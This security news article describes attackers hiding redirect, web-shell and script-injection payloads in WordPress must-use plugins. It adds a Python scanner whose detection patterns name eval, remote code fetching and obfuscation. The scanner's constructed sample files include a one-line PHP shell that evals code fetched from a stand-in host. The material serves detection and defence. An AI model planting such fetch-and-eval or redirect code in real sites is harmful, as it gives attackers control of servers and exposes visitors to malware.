Hackers abuse MU plugins to inject malicious payloads to WordPress

📟 News

Date: 01/04/2025

According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected.

The technique was first discovered in February 2025, but its spread rate is continuously growing, and currently attackers abuse MU plugins to run three different types of malicious code.

Must-Use Plugins represent a special type of WordPress plugins that run every time the page is loaded and don’t require activation in the Admin Panel. These PHP files are stored in the wp-content/mu-plugins/ directory, are executed automatically, and don’t appear in the Admin Panel on the Plugins page unless the Must-Use filter is selected.

Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.

Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).

Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:

  • redirect.php redirects visitors (excluding bots and logged-in admins) to the malicious website updatesnow[.]net, which displays a fake browser update prompt to trick the victim into downloading malware;
  • index.php is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; and
  • custom-js-loader.php loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.
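As an added defensive example (not part of the Sucuri report or this article), the script below inventories a wp-content/mu-plugins/ directory and flags the code patterns the three payload types rely on: a Location redirect, remote code fetching and eval, obfuscation, and script injection. The sample files and the domain example.invalid are constructed stand-ins, not the real payloads.

```python
"""Audit wp-content/mu-plugins/ for files that warrant review.

MU plugins run on every page load without activation and are hidden from
the default plugin list, so every file here deserves the scrutiny given to
an unknown plugin. The indicators below are generic and constructed for
this example; they approximate the behaviours described in the report.
"""
import os
import re
import tempfile

# Patterns typical of the three payload types: redirects, remote code
# loading / web shells, and injected JavaScript (plus common obfuscation).
SUSPICIOUS = {
    "redirect":    re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "remote_code": re.compile(r"(file_get_contents|curl_exec)\s*\(.*https?://", re.I),
    "eval":        re.compile(r"\b(eval|assert)\s*\(", re.I),
    "obfuscation": re.compile(r"base64_decode\s*\(", re.I),
    "js_inject":   re.compile(r"wp_enqueue_script|<script", re.I),
}

def scan_mu_plugins(mu_dir: str) -> dict:
    """Return {filename: [indicator names]} for every PHP file in mu_dir.
    Files matching nothing are still listed (empty list) so the reviewer
    sees the full inventory, not only the hits."""
    findings = {}
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not (os.path.isfile(path) and name.endswith(".php")):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        findings[name] = [label for label, rx in SUSPICIOUS.items() if rx.search(src)]
    return findings

def demo() -> dict:
    """Build a constructed mu-plugins directory and scan it."""
    samples = {  # constructed sample files, not real malware
        "site-config.php": "<?php define('SITE_MODE', 'prod');",  # benign helper
        "redirect.php": "<?php if (!is_user_logged_in()) { header('Location: https://example.invalid/'); exit; }",
        "index.php": "<?php eval(file_get_contents('https://example.invalid/x.txt'));",
    }
    with tempfile.TemporaryDirectory() as mu_dir:
        for name, body in samples.items():
            with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_mu_plugins(mu_dir)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {'clean' if not hits else ', '.join(hits)}")
```

Point scan_mu_plugins() at a real wp-content/mu-plugins/ path to review a live site; any file you did not place there yourself should be treated as suspect regardless of whether it matches a pattern.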

The most dangerous payload is the web shell since it enables attackers to remotely execute commands on the server, steal data, and deliver subsequent attacks on resource users and visitors.

The other two malware samples are more likely to damage the website’s reputation and its SEO rankings due to suspicious redirects and attempts to install malware on visitors’ computers.

The infection technique used by the malefactors remains unknown for now. It is assumed that the attackers exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.
